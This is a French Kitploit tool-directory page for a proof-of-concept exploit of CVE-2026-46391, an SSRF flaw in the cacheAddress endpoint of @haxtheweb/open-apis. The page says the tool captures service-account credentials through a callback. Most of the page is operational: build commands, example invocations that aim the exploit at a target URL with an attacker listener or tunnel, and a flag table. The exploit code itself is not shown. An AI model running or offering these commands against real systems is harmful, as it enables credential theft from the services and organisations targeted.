Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-46391 — Exploit de preuve de concept pour CVE-2026-46391 | Kitploit
Outils/GitHubGitHub/bradyjmcl/cve-2026-46391
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

Exploit de preuve de concept pour CVE-2026-46391

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-46391 - Exposition d'identifiants via SSRF dans @haxtheweb/open-apis

test

Preuve de concept pour CVE-2026-46391. Déclenche la vulnérabilité SSRF dans le endpoint cacheAddress de @haxtheweb/open-apis et capture les identifiants du compte de service envoyés dans le callback.

Build

root@kitploit:~
go build -o cve-2026-46391 .

Test

root@kitploit:~
go test ./...

Usage

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]

Options

Exemples

Direct (même réseau que la cible) :

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

Via VPS/tunnel Cloudflare/etc. :

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

Port et délai d'attente personnalisés :

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
Télécharger l’outil
FlagDescriptionDéfaut
-u, --urlRacine web cible (ex. http://10.10.0.80:3000)requis
-l, --listenerVotre IP/nom d'hôte ou URL de tunnel (ex. 192.168.1.10, https://uuid.trycloudflare.com)requis
-p, --portPort local d'écoute8080
-t, --timeoutSecondes d'attente du callback30
-v, --verboseAffiche les en-têtes et le corps de chaque requête entrantedésactivé